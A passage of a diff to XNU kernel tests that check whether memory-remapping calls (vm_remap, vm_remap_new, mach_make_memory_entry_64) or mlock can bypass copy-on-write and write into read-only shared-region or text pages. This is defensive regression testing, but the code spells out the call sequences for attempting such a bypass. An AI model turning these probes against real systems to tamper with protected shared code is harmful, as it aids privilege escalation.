+                   share_mode_str[info.share_mode],
+                   info.object_id);
+               if (depth > 0 &&
+                   (info.protection == VM_PROT_READ) &&
+                   (info.max_protection == VM_PROT_READ)) {
+                       /* nested and read-only: bingo! */
+                       break;
+               }
+       }
+       if (address >= SHARED_REGION_BASE + SHARED_REGION_SIZE) {
+               T_SKIP("could not find read-only nested mapping");
+               T_END;
+       }
+
+       /* test vm_remap() of RO */
+       before = *(uint32_t *)(uintptr_t)address;
+       remap_address = 0;
+       remap_size = size;
+       kr = mach_vm_remap(mach_task_self(),
+           &remap_address,
+           remap_size,
+           0,
+           VM_FLAGS_ANYWHERE | VM_FLAGS_RETURN_DATA_ADDR,
+           mach_task_self(),
+           address,
+           FALSE,
+           &cur_prot,
+           &max_prot,
+           VM_INHERIT_DEFAULT);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_remap()");
+//     T_QUIET; T_ASSERT_EQ(cur_prot, VM_PROT_READ, "cur_prot is read-only");
+//     T_QUIET; T_ASSERT_EQ(max_prot, VM_PROT_READ, "max_prot is read-only");
+       /* check that region is still nested */
+       tmp_address = address;
+       tmp_size = 0;
+       depth = 99;
+       count = VM_REGION_SUBMAP_INFO_COUNT_64;
+       kr = mach_vm_region_recurse(mach_task_self(),
+           &tmp_address,
+           &tmp_size,
+           &depth,
+           (vm_region_recurse_info_t)&info,
+           &count);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_region_recurse()");
+       T_LOG("0x%llx - 0x%llx depth:%d %s/%s %s 0x%x",
+           tmp_address, tmp_address + tmp_size, depth,
+           prot_str[info.protection],
+           prot_str[info.max_protection],
+           share_mode_str[info.share_mode],
+           info.object_id);
+       T_QUIET; T_ASSERT_EQ(tmp_address, address, "address hasn't changed");
+//     T_QUIET; T_ASSERT_EQ(tmp_size, size, "size hasn't changed");
+       T_QUIET; T_ASSERT_GT(depth, 0, "still nested");
+       T_QUIET; T_ASSERT_EQ(info.protection, VM_PROT_READ, "cur_prot still read-only");
+//     T_QUIET; T_ASSERT_EQ(info.max_protection, VM_PROT_READ, "max_prot still read-only");
+       /* check that new mapping is read-only */
+       tmp_address = remap_address;
+       tmp_size = 0;
+       depth = 99;
+       count = VM_REGION_SUBMAP_INFO_COUNT_64;
+       kr = mach_vm_region_recurse(mach_task_self(),
+           &tmp_address,
+           &tmp_size,
+           &depth,
+           (vm_region_recurse_info_t)&info,
+           &count);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_region_recurse()");
+       T_LOG("0x%llx - 0x%llx depth:%d %s/%s %s 0x%x",
+           tmp_address, tmp_address + tmp_size, depth,
+           prot_str[info.protection],
+           prot_str[info.max_protection],
+           share_mode_str[info.share_mode],
+           info.object_id);
+       T_QUIET; T_ASSERT_EQ(tmp_address, remap_address, "address hasn't changed");
+//     T_QUIET; T_ASSERT_EQ(tmp_size, size, "size hasn't changed");
+       T_QUIET; T_ASSERT_EQ(info.protection, VM_PROT_READ, "new cur_prot read-only");
+//     T_QUIET; T_ASSERT_EQ(info.max_protection, VM_PROT_READ, "new max_prot read-only");
+       remap = *(uint32_t *)(uintptr_t)remap_address;
+       T_QUIET; T_ASSERT_EQ(remap, before, "remap matches original");
+// this would crash if actually read-only:
+//     *(uint32_t *)(uintptr_t)remap_address = before + 1;
+       after = *(uint32_t *)(uintptr_t)address;
+       T_LOG("vm_remap(): 0x%llx 0x%x -> 0x%x", address, before, after);
+//     *(uint32_t *)(uintptr_t)remap_address = before;
+       if (before != after) {
+               T_FAIL("vm_remap() bypassed copy-on-write");
+       } else {
+               T_PASS("vm_remap() did not bypass copy-on-write");
+       }
+       /* cleanup */
+       kr = mach_vm_deallocate(mach_task_self(), remap_address, remap_size);
+       T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "vm_deallocate()");
+       T_PASS("vm_remap() read-only");
+
+#if defined(VM_MEMORY_ROSETTA)
+       if (dlsym(RTLD_DEFAULT, "mach_vm_remap_new") == NULL) {
+               T_PASS("vm_remap_new() is not present");
+               goto skip_vm_remap_new_ro;
+       }
+       /* test vm_remap_new() of RO */
+       before = *(uint32_t *)(uintptr_t)address;
+       remap_address = 0;
+       remap_size = size;
+       cur_prot = VM_PROT_READ | VM_PROT_WRITE;
+       max_prot = VM_PROT_READ | VM_PROT_WRITE;
+       kr = mach_vm_remap_new(mach_task_self(),
+           &remap_address,
+           remap_size,
+           0,
+           VM_FLAGS_ANYWHERE,
+           mach_task_self(),
+           address,
+           FALSE,
+           &cur_prot,
+           &max_prot,
+           VM_INHERIT_DEFAULT);
+       T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "vm_remap_new()");
+       if (kr == KERN_PROTECTION_FAILURE) {
+               /* wrong but not a security issue... */
+               goto skip_vm_remap_new_ro;
+       }
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_remap_new()");
+       remap = *(uint32_t *)(uintptr_t)remap_address;
+       T_QUIET; T_ASSERT_EQ(remap, before, "remap matches original");
+       *(uint32_t *)(uintptr_t)remap_address = before + 1;
+       after = *(uint32_t *)(uintptr_t)address;
+       T_LOG("vm_remap_new(): 0x%llx 0x%x -> 0x%x", address, before, after);
+       *(uint32_t *)(uintptr_t)remap_address = before;
+       if (before != after) {
+               T_FAIL("vm_remap_new() bypassed copy-on-write");
+       } else {
+               T_PASS("vm_remap_new() did not bypass copy-on-write");
+       }
+       /* check that region is still nested */
+       tmp_address = address;
+       tmp_size = 0;
+       depth = 99;
+       count = VM_REGION_SUBMAP_INFO_COUNT_64;
+       kr = mach_vm_region_recurse(mach_task_self(),
+           &tmp_address,
+           &tmp_size,
+           &depth,
+           (vm_region_recurse_info_t)&info,
+           &count);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_region_recurse()");
+       T_LOG("0x%llx - 0x%llx depth:%d %s/%s %s 0x%x",
+           tmp_address, tmp_address + tmp_size, depth,
+           prot_str[info.protection],
+           prot_str[info.max_protection],
+           share_mode_str[info.share_mode],
+           info.object_id);
+       T_QUIET; T_ASSERT_EQ(tmp_address, address, "address hasn't changed");
+//     T_QUIET; T_ASSERT_EQ(tmp_size, size, "size hasn't changed");
+       T_QUIET; T_ASSERT_GT(depth, 0, "still nested");
+       T_QUIET; T_ASSERT_EQ(info.protection, VM_PROT_READ, "cur_prot still read-only");
+       T_QUIET; T_ASSERT_EQ(info.max_protection, VM_PROT_READ, "max_prot still read-only");
+       T_PASS("vm_remap_new() read-only");
+skip_vm_remap_new_ro:
+#else /* defined(VM_MEMORY_ROSETTA) */
+       /* pre-BigSur SDK: no vm_remap_new() */
+       T_LOG("No vm_remap_new() to test");
+#endif /* defined(VM_MEMORY_ROSETTA) */
+
+       /* test mach_make_memory_entry_64(VM_SHARE) of RO */
+       before = *(uint32_t *)(uintptr_t)address;
+       remap_size = size;
+       mem_entry = MACH_PORT_NULL;
+       kr = mach_make_memory_entry_64(mach_task_self(),
+           &remap_size,
+           address,
+           MAP_MEM_VM_SHARE | VM_PROT_READ | VM_PROT_WRITE,
+           &mem_entry,
+           MACH_PORT_NULL);
+       T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_make_memory_entry_64(VM_SHARE)");
+       if (kr == KERN_PROTECTION_FAILURE) {
+               /* wrong but not a security issue... */
+               goto skip_mem_entry_vm_share_ro;
+       }
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "mach_make_memory_entry_64(VM_SHARE)");
+       remap_address = 0;
+       kr = mach_vm_map(mach_task_self(),
+           &remap_address,
+           remap_size,
+           0,              /* mask */
+           VM_FLAGS_ANYWHERE,
+           mem_entry,
+           0,              /* offset */
+           FALSE,              /* copy */
+           VM_PROT_READ | VM_PROT_WRITE,
+           VM_PROT_READ | VM_PROT_WRITE,
+           VM_INHERIT_DEFAULT);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_map()");
+       remap = *(uint32_t *)(uintptr_t)remap_address;
+       T_QUIET; T_ASSERT_EQ(remap, before, "remap matches original");
+       *(uint32_t *)(uintptr_t)remap_address = before + 1;
+       after = *(uint32_t *)(uintptr_t)address;
+       T_LOG("mem_entry(VM_SHARE): 0x%llx 0x%x -> 0x%x", address, before, after);
+       *(uint32_t *)(uintptr_t)remap_address = before;
+       if (before != after) {
+               T_FAIL("mem_entry(VM_SHARE) bypassed copy-on-write");
+       } else {
+               T_PASS("mem_entry(VM_SHARE) did not bypass copy-on-write");
+       }
+       /* check that region is still nested */
+       tmp_address = address;
+       tmp_size = 0;
+       depth = 99;
+       count = VM_REGION_SUBMAP_INFO_COUNT_64;
+       kr = mach_vm_region_recurse(mach_task_self(),
+           &tmp_address,
+           &tmp_size,
+           &depth,
+           (vm_region_recurse_info_t)&info,
+           &count);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_region_recurse()");
+       T_LOG("0x%llx - 0x%llx depth:%d %s/%s %s 0x%x",
+           tmp_address, tmp_address + tmp_size, depth,
+           prot_str[info.protection],
+           prot_str[info.max_protection],
+           share_mode_str[info.share_mode],
+           info.object_id);
+       T_QUIET; T_ASSERT_EQ(tmp_address, address, "address hasn't changed");
+//     T_QUIET; T_ASSERT_EQ(tmp_size, size, "size hasn't changed");
+       T_QUIET; T_ASSERT_GT(depth, 0, "still nested");
+       T_QUIET; T_ASSERT_EQ(info.protection, VM_PROT_READ, "cur_prot still read-only");
+       T_QUIET; T_ASSERT_EQ(info.max_protection, VM_PROT_READ, "max_prot still read-only");
+       /* check that new mapping is a copy */
+       tmp_address = remap_address;
+       tmp_size = 0;
+       depth = 99;
+       count = VM_REGION_SUBMAP_INFO_COUNT_64;
+       kr = mach_vm_region_recurse(mach_task_self(),
+           &tmp_address,
+           &tmp_size,
+           &depth,
+           (vm_region_recurse_info_t)&info,
+           &count);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_region_recurse()");
+       T_LOG("0x%llx - 0x%llx depth:%d %s/%s %s 0x%x",
+           tmp_address, tmp_address + tmp_size, depth,
+           prot_str[info.protection],
+           prot_str[info.max_protection],
+           share_mode_str[info.share_mode],
+           info.object_id);
+       T_QUIET; T_ASSERT_EQ(tmp_address, remap_address, "address hasn't changed");
+//     T_QUIET; T_ASSERT_EQ(tmp_size, size, "size hasn't changed");
+       T_QUIET; T_ASSERT_EQ(depth, 0, "new mapping is unnested");
+//     T_QUIET; T_ASSERT_EQ(info.protection, VM_PROT_READ, "new cur_prot read-only");
+//     T_QUIET; T_ASSERT_EQ(info.max_protection, VM_PROT_READ, "new max_prot read-only");
+       /* cleanup */
+       kr = mach_vm_deallocate(mach_task_self(), remap_address, remap_size);
+       T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "vm_deallocate()");
+       T_PASS("mem_entry(VM_SHARE) read-only");
+skip_mem_entry_vm_share_ro:
+
+       /* test mach_make_memory_entry_64() of RO */
+       before = *(uint32_t *)(uintptr_t)address;
+       remap_size = size;
+       mem_entry = MACH_PORT_NULL;
+       kr = mach_make_memory_entry_64(mach_task_self(),
+           &remap_size,
+           address,
+           VM_PROT_READ | VM_PROT_WRITE,
+           &mem_entry,
+           MACH_PORT_NULL);
+       T_QUIET; T_ASSERT_EQ(kr, KERN_PROTECTION_FAILURE, "mach_make_memory_entry_64()");
+       /* check that region is still nested */
+       tmp_address = address;
+       tmp_size = 0;
+       depth = 99;
+       count = VM_REGION_SUBMAP_INFO_COUNT_64;
+       kr = mach_vm_region_recurse(mach_task_self(),
+           &tmp_address,
+           &tmp_size,
+           &depth,
+           (vm_region_recurse_info_t)&info,
+           &count);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_region_recurse()");
+       T_LOG("0x%llx - 0x%llx depth:%d %s/%s %s 0x%x",
+           tmp_address, tmp_address + tmp_size, depth,
+           prot_str[info.protection],
+           prot_str[info.max_protection],
+           share_mode_str[info.share_mode],
+           info.object_id);
+       T_QUIET; T_ASSERT_EQ(tmp_address, address, "address hasn't changed");
+//     T_QUIET; T_ASSERT_EQ(tmp_size, size, "size hasn't changed");
+//     T_QUIET; T_ASSERT_GT(depth, 0, "still nested");
+       T_QUIET; T_ASSERT_EQ(info.protection, VM_PROT_READ, "cur_prot still read-only");
+       if (depth > 0) {
+               T_QUIET; T_ASSERT_EQ(info.max_protection, VM_PROT_READ, "max_prot still read-only");
+       }
+       T_PASS("mem_entry() read-only");
+
+
+       /*
+        * Step 2 - check that one can not share write access with a writable
+        * mapping in the shared region.
+        */
+       size = 0;
+       for (address = SHARED_REGION_BASE;
+           address < SHARED_REGION_BASE + SHARED_REGION_SIZE;
+           address += size) {
+               size = 0;
+               depth = 99;
+               count = VM_REGION_SUBMAP_INFO_COUNT_64;
+               kr = mach_vm_region_recurse(mach_task_self(),
+                   &address,
+                   &size,
+                   &depth,
+                   (vm_region_recurse_info_t)&info,
+                   &count);
+               T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "vm_region_recurse()");
+               if (kr == KERN_INVALID_ADDRESS) {
+                       T_SKIP("could not find writable nested mapping");
+                       T_END;
+               }
+               T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_region_recurse()");
+               T_LOG("0x%llx - 0x%llx depth:%d %s/%s %s 0x%x",
+                   address, address + size, depth,
+                   prot_str[info.protection],
+                   prot_str[info.max_protection],
+                   share_mode_str[info.share_mode],
+                   info.object_id);
+               if (depth > 0 && (info.protection & VM_PROT_WRITE)) {
+                       /* nested and writable: bingo! */
+                       break;
+               }
+       }
+       if (address >= SHARED_REGION_BASE + SHARED_REGION_SIZE) {
+               T_SKIP("could not find writable nested mapping");
+               T_END;
+       }
+
+       /* test vm_remap() of RW */
+       before = *(uint32_t *)(uintptr_t)address;
+       remap_address = 0;
+       remap_size = size;
+       kr = mach_vm_remap(mach_task_self(),
+           &remap_address,
+           remap_size,
+           0,
+           VM_FLAGS_ANYWHERE | VM_FLAGS_RETURN_DATA_ADDR,
+           mach_task_self(),
+           address,
+           FALSE,
+           &cur_prot,
+           &max_prot,
+           VM_INHERIT_DEFAULT);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_remap()");
+       if (!(cur_prot & VM_PROT_WRITE)) {
+               T_LOG("vm_remap(): 0x%llx not writable %s/%s",
+                   remap_address, prot_str[cur_prot], prot_str[max_prot]);
+               T_ASSERT_FAIL("vm_remap() remapping not writable");
+       }
+       remap = *(uint32_t *)(uintptr_t)remap_address;
+       T_QUIET; T_ASSERT_EQ(remap, before, "remap matches original");
+       *(uint32_t *)(uintptr_t)remap_address = before + 1;
+       after = *(uint32_t *)(uintptr_t)address;
+       T_LOG("vm_remap(): 0x%llx 0x%x -> 0x%x", address, before, after);
+       *(uint32_t *)(uintptr_t)remap_address = before;
+       if (before != after) {
+               T_FAIL("vm_remap() bypassed copy-on-write");
+       } else {
+               T_PASS("vm_remap() did not bypass copy-on-write");
+       }
+       /* check that region is still nested */
+       tmp_address = address;
+       tmp_size = 0;
+       depth = 99;
+       count = VM_REGION_SUBMAP_INFO_COUNT_64;
+       kr = mach_vm_region_recurse(mach_task_self(),
+           &tmp_address,
+           &tmp_size,
+           &depth,
+           (vm_region_recurse_info_t)&info,
+           &count);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_region_recurse()");
+       T_LOG("0x%llx - 0x%llx depth:%d %s/%s %s 0x%x",
+           tmp_address, tmp_address + tmp_size, depth,
+           prot_str[info.protection],
+           prot_str[info.max_protection],
+           share_mode_str[info.share_mode],
+           info.object_id);
+       T_QUIET; T_ASSERT_EQ(tmp_address, address, "address hasn't changed");
+//     T_QUIET; T_ASSERT_EQ(tmp_size, size, "size hasn't changed");
+       T_QUIET; T_ASSERT_GT(depth, 0, "still nested");
+       T_QUIET; T_ASSERT_EQ(info.protection, VM_PROT_DEFAULT, "cur_prot still writable");
+       T_QUIET; T_ASSERT_EQ((info.max_protection & VM_PROT_WRITE), VM_PROT_WRITE, "max_prot still writable");
+       /* cleanup */
+       kr = mach_vm_deallocate(mach_task_self(), remap_address, remap_size);
+       T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "vm_deallocate()");
+
+#if defined(VM_MEMORY_ROSETTA)
+       if (dlsym(RTLD_DEFAULT, "mach_vm_remap_new") == NULL) {
+               T_PASS("vm_remap_new() is not present");
+               goto skip_vm_remap_new_rw;
+       }
+       /* test vm_remap_new() of RW */
+       before = *(uint32_t *)(uintptr_t)address;
+       remap_address = 0;
+       remap_size = size;
+       cur_prot = VM_PROT_READ | VM_PROT_WRITE;
+       max_prot = VM_PROT_READ | VM_PROT_WRITE;
+       kr = mach_vm_remap_new(mach_task_self(),
+           &remap_address,
+           remap_size,
+           0,
+           VM_FLAGS_ANYWHERE,
+           mach_task_self(),
+           address,
+           FALSE,
+           &cur_prot,
+           &max_prot,
+           VM_INHERIT_DEFAULT);
+       T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "vm_remap_new()");
+       if (kr == KERN_PROTECTION_FAILURE) {
+               /* wrong but not a security issue... */
+               goto skip_vm_remap_new_rw;
+       }
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_remap_new()");
+       if (!(cur_prot & VM_PROT_WRITE)) {
+               T_LOG("vm_remap_new(): 0x%llx not writable %s/%s",
+                   remap_address, prot_str[cur_prot], prot_str[max_prot]);
+               T_ASSERT_FAIL("vm_remap_new() remapping not writable");
+       }
+       remap = *(uint32_t *)(uintptr_t)remap_address;
+       T_QUIET; T_ASSERT_EQ(remap, before, "remap matches original");
+       *(uint32_t *)(uintptr_t)remap_address = before + 1;
+       after = *(uint32_t *)(uintptr_t)address;
+       T_LOG("vm_remap_new(): 0x%llx 0x%x -> 0x%x", address, before, after);
+       *(uint32_t *)(uintptr_t)remap_address = before;
+       if (before != after) {
+               T_FAIL("vm_remap_new() bypassed copy-on-write");
+       } else {
+               T_PASS("vm_remap_new() did not bypass copy-on-write");
+       }
+       /* check that region is still nested */
+       tmp_address = address;
+       tmp_size = 0;
+       depth = 99;
+       count = VM_REGION_SUBMAP_INFO_COUNT_64;
+       kr = mach_vm_region_recurse(mach_task_self(),
+           &tmp_address,
+           &tmp_size,
+           &depth,
+           (vm_region_recurse_info_t)&info,
+           &count);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_region_recurse()");
+       T_LOG("0x%llx - 0x%llx depth:%d %s/%s %s 0x%x",
+           tmp_address, tmp_address + tmp_size, depth,
+           prot_str[info.protection],
+           prot_str[info.max_protection],
+           share_mode_str[info.share_mode],
+           info.object_id);
+       T_QUIET; T_ASSERT_EQ(tmp_address, address, "address hasn't changed");
+//     T_QUIET; T_ASSERT_EQ(tmp_size, size, "size hasn't changed");
+       T_QUIET; T_ASSERT_GT(depth, 0, "still nested");
+       T_QUIET; T_ASSERT_EQ(info.protection, VM_PROT_DEFAULT, "cur_prot still writable");
+       T_QUIET; T_ASSERT_EQ((info.max_protection & VM_PROT_WRITE), VM_PROT_WRITE, "max_prot still writable");
+       /* cleanup */
+       kr = mach_vm_deallocate(mach_task_self(), remap_address, remap_size);
+       T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "vm_deallocate()");
+skip_vm_remap_new_rw:
+#else /* defined(VM_MEMORY_ROSETTA) */
+       /* pre-BigSur SDK: no vm_remap_new() */
+       T_LOG("No vm_remap_new() to test");
+#endif /* defined(VM_MEMORY_ROSETTA) */
+
+       /* test mach_make_memory_entry_64(VM_SHARE) of RW */
+       before = *(uint32_t *)(uintptr_t)address;
+       remap_size = size;
+       mem_entry = MACH_PORT_NULL;
+       kr = mach_make_memory_entry_64(mach_task_self(),
+           &remap_size,
+           address,
+           MAP_MEM_VM_SHARE | VM_PROT_READ | VM_PROT_WRITE,
+           &mem_entry,
+           MACH_PORT_NULL);
+       T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_make_memory_entry_64(VM_SHARE)");
+       if (kr == KERN_PROTECTION_FAILURE) {
+               /* wrong but not a security issue... */
+               goto skip_mem_entry_vm_share_rw;
+       }
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "mach_make_memory_entry_64(VM_SHARE)");
+       T_QUIET; T_ASSERT_EQ(remap_size, size, "mem_entry(VM_SHARE) should cover whole mapping");
+//     T_LOG("AFTER MAKE_MEM_ENTRY(VM_SHARE) 0x%llx...", address); fflush(stdout); fflush(stderr); getchar();
+       remap_address = 0;
+       kr = mach_vm_map(mach_task_self(),
+           &remap_address,
+           remap_size,
+           0,              /* mask */
+           VM_FLAGS_ANYWHERE,
+           mem_entry,
+           0,              /* offset */
+           FALSE,              /* copy */
+           VM_PROT_READ | VM_PROT_WRITE,
+           VM_PROT_READ | VM_PROT_WRITE,
+           VM_INHERIT_DEFAULT);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_map()");
+       remap = *(uint32_t *)(uintptr_t)remap_address;
+       T_QUIET; T_ASSERT_EQ(remap, before, "remap matches original");
+//     T_LOG("AFTER VM_MAP 0x%llx...", remap_address); fflush(stdout); fflush(stderr); getchar();
+       *(uint32_t *)(uintptr_t)remap_address = before + 1;
+//     T_LOG("AFTER WRITE 0x%llx...", remap_address); fflush(stdout); fflush(stderr); getchar();
+       after = *(uint32_t *)(uintptr_t)address;
+       T_LOG("mem_entry(VM_SHARE): 0x%llx 0x%x -> 0x%x", address, before, after);
+       *(uint32_t *)(uintptr_t)remap_address = before;
+       if (before != after) {
+               T_FAIL("mem_entry(VM_SHARE) bypassed copy-on-write");
+       } else {
+               T_PASS("mem_entry(VM_SHARE) did not bypass copy-on-write");
+       }
+       /* check that region is still nested */
+       tmp_address = address;
+       tmp_size = 0;
+       depth = 99;
+       count = VM_REGION_SUBMAP_INFO_COUNT_64;
+       kr = mach_vm_region_recurse(mach_task_self(),
+           &tmp_address,
+           &tmp_size,
+           &depth,
+           (vm_region_recurse_info_t)&info,
+           &count);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_region_recurse()");
+       T_LOG("0x%llx - 0x%llx depth:%d %s/%s %s 0x%x",
+           tmp_address, tmp_address + tmp_size, depth,
+           prot_str[info.protection],
+           prot_str[info.max_protection],
+           share_mode_str[info.share_mode],
+           info.object_id);
+       T_QUIET; T_ASSERT_EQ(tmp_address, address, "address hasn't changed");
+//     T_QUIET; T_ASSERT_EQ(tmp_size, size, "size hasn't changed");
+       T_QUIET; T_ASSERT_GT(depth, 0, "still nested");
+       T_QUIET; T_ASSERT_EQ(info.protection, VM_PROT_DEFAULT, "cur_prot still writable");
+       T_QUIET; T_ASSERT_EQ((info.max_protection & VM_PROT_WRITE), VM_PROT_WRITE, "max_prot still writable");
+       /* cleanup */
+       kr = mach_vm_deallocate(mach_task_self(), remap_address, remap_size);
+       T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "vm_deallocate()");
+       mach_port_deallocate(mach_task_self(), mem_entry);
+skip_mem_entry_vm_share_rw:
+
+       /* test mach_make_memory_entry_64() of RW */
+       before = *(uint32_t *)(uintptr_t)address;
+       remap_size = size;
+       mem_entry = MACH_PORT_NULL;
+       kr = mach_make_memory_entry_64(mach_task_self(),
+           &remap_size,
+           address,
+           VM_PROT_READ | VM_PROT_WRITE,
+           &mem_entry,
+           MACH_PORT_NULL);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "mach_make_memory_entry_64()");
+       remap_address = 0;
+       kr = mach_vm_map(mach_task_self(),
+           &remap_address,
+           remap_size,
+           0,              /* mask */
+           VM_FLAGS_ANYWHERE,
+           mem_entry,
+           0,              /* offset */
+           FALSE,              /* copy */
+           VM_PROT_READ | VM_PROT_WRITE,
+           VM_PROT_READ | VM_PROT_WRITE,
+           VM_INHERIT_DEFAULT);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_map()");
+       remap = *(uint32_t *)(uintptr_t)remap_address;
+       T_QUIET; T_ASSERT_EQ(remap, before, "remap matches original");
+       *(uint32_t *)(uintptr_t)remap_address = before + 1;
+       after = *(uint32_t *)(uintptr_t)address;
+       T_LOG("mem_entry(): 0x%llx 0x%x -> 0x%x", address, before, after);
+       *(uint32_t *)(uintptr_t)remap_address = before;
+       /* check that region is no longer nested */
+       tmp_address = address;
+       tmp_size = 0;
+       depth = 99;
+       count = VM_REGION_SUBMAP_INFO_COUNT_64;
+       kr = mach_vm_region_recurse(mach_task_self(),
+           &tmp_address,
+           &tmp_size,
+           &depth,
+           (vm_region_recurse_info_t)&info,
+           &count);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_region_recurse()");
+       T_LOG("0x%llx - 0x%llx depth:%d %s/%s %s 0x%x",
+           tmp_address, tmp_address + tmp_size, depth,
+           prot_str[info.protection],
+           prot_str[info.max_protection],
+           share_mode_str[info.share_mode],
+           info.object_id);
+       if (before != after) {
+               if (depth == 0) {
+                       T_PASS("mem_entry() honored copy-on-write");
+               } else {
+                       T_FAIL("mem_entry() did not trigger copy-on-write");
+               }
+       } else {
+               T_FAIL("mem_entry() did not honor copy-on-write");
+       }
+       T_QUIET; T_ASSERT_EQ(tmp_address, address, "address hasn't changed");
+//     T_QUIET; T_ASSERT_EQ(tmp_size, size, "size hasn't changed");
+       T_QUIET; T_ASSERT_EQ(depth, 0, "no longer nested");
+       T_QUIET; T_ASSERT_EQ(info.protection, VM_PROT_DEFAULT, "cur_prot still writable");
+       T_QUIET; T_ASSERT_EQ((info.max_protection & VM_PROT_WRITE), VM_PROT_WRITE, "max_prot still writable");
+       /* cleanup */
+       kr = mach_vm_deallocate(mach_task_self(), remap_address, remap_size);
+       T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "vm_deallocate()");
+       mach_port_deallocate(mach_task_self(), mem_entry);
+}
+
 T_DECL(copyoverwrite_submap_protection, "test copywrite vm region submap \
     protection", T_META_ALL_VALID_ARCHS(true))
 {
@@ -1029,14 +1701,14 @@ T_DECL(wire_text, "test wired text for rdar://problem/16783546 Wiring code in \
     the shared region triggers code-signing violations",
     T_META_ALL_VALID_ARCHS(true))
 {
-       char *addr;
+       uint32_t *addr, before, after;
        int retval;
        int saved_errno;
        kern_return_t kr;
        vm_address_t map_addr, remap_addr;
        vm_prot_t curprot, maxprot;
 
-       addr = (char *)&printf;
+       addr = (uint32_t *)&printf;
 #if __has_feature(ptrauth_calls)
        map_addr = (vm_address_t)(uintptr_t)ptrauth_strip(addr, ptrauth_key_function_pointer);
 #else /* __has_feature(ptrauth_calls) */
@@ -1052,31 +1724,43 @@ T_DECL(wire_text, "test wired text for rdar://problem/16783546 Wiring code in \
            VM_INHERIT_DEFAULT);
        T_ASSERT_EQ(kr, KERN_SUCCESS, "vm_remap error 0x%x (%s)",
            kr, mach_error_string(kr));
+       before = *addr;
        retval = mlock(addr, 4096);
+       after = *addr;
        if (retval != 0) {
                saved_errno = errno;
                T_ASSERT_EQ(saved_errno, EACCES, "wire shared text error %d (%s), expected: %d",
                    saved_errno, strerror(saved_errno), EACCES);
+       } else if (after != before) {
+               T_ASSERT_FAIL("shared text changed by wiring at %p 0x%x -> 0x%x", addr, before, after);
        } else {
                T_PASS("wire shared text");
        }
 
-       addr = (char *) &fprintf;
+       addr = (uint32_t *) &fprintf;
+       before = *addr;
        retval = mlock(addr, 4096);
+       after = *addr;
        if (retval != 0) {
                saved_errno = errno;
                T_ASSERT_EQ(saved_errno, EACCES, "wire shared text error %d (%s), expected: %d",
                    saved_errno, strerror(saved_errno), EACCES);
+       } else if (after != before) {
+               T_ASSERT_FAIL("shared text changed by wiring at %p 0x%x -> 0x%x", addr, before, after);
        } else {
                T_PASS("wire shared text");
        }
 
-       addr = (char *) &testmain_wire_text;
+       addr = (uint32_t *) &testmain_wire_text;
+       before = *addr;
        retval = mlock(addr, 4096);
+       after = *addr;
        if (retval != 0) {
                saved_errno = errno;
                T_ASSERT_EQ(saved_errno, EACCES, "wire text error return error %d (%s)",
                    saved_errno, strerror(saved_errno));
+       } else if (after != before) {
+               T_ASSERT_FAIL("text changed by wiring at %p 0x%x -> 0x%x", addr, before, after);
        } else {
                T_PASS("wire text");
        }
diff --git a/tests/xnu_quick_test.entitlements b/tests/xnu_quick_test.entitlements
deleted file mode 100644 (file)
index ada01fb..0000000
+++ /dev/null
@@ -1,8 +0,0 @@
-<?xml version="1.0" encoding="UTF-8"?>
-<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
-<plist version="1.0">
-<dict>
-       <key>com.apple.rootless.datavault.controller.internal</key>
-       <true/>
-</dict>
-</plist>
diff --git a/tests/xnu_quick_test_entitled.c b/tests/xnu_quick_test_entitled.c
deleted file mode 100644 (file)
index 24c96e4..0000000
+++ /dev/null
@@ -1,85 +0,0 @@
-#include <darwintest.h>
-
-#include <fcntl.h>
-#include <stdlib.h>
-#include <unistd.h>
-#include <sys/types.h>
-#include <sys/sysctl.h>
-#include <sys/disk.h>
-#include <sys/ioctl.h>
-#include <sys/mount.h>
-
-#if !(TARGET_OS_IPHONE && !TARGET_OS_SIMULATOR)
-#include <sys/csr.h>
-#endif
-
-T_GLOBAL_META(
-       T_META_NAMESPACE("xnu.quicktest"),
-       T_META_CHECK_LEAKS(false),
-       T_META_RUN_CONCURRENTLY(true)
-       );
-
-
-/*  **************************************************************************************************************
- *     Test ioctl system calls.
- *  **************************************************************************************************************
- */
-T_DECL(ioctl, "Sanity check of ioctl by exercising DKIOCGETBLOCKCOUNT and DKIOCGETBLOCKSIZE",
-    T_META_ASROOT(true))
-{
-       int                                     my_err;
-       int                                     my_fd = -1;
-       struct statfs *         my_infop;
-       char *                          my_ptr;
-       int                                     my_blksize;
-       long long                       my_block_count;
-       char                            my_name[MAXPATHLEN];
-
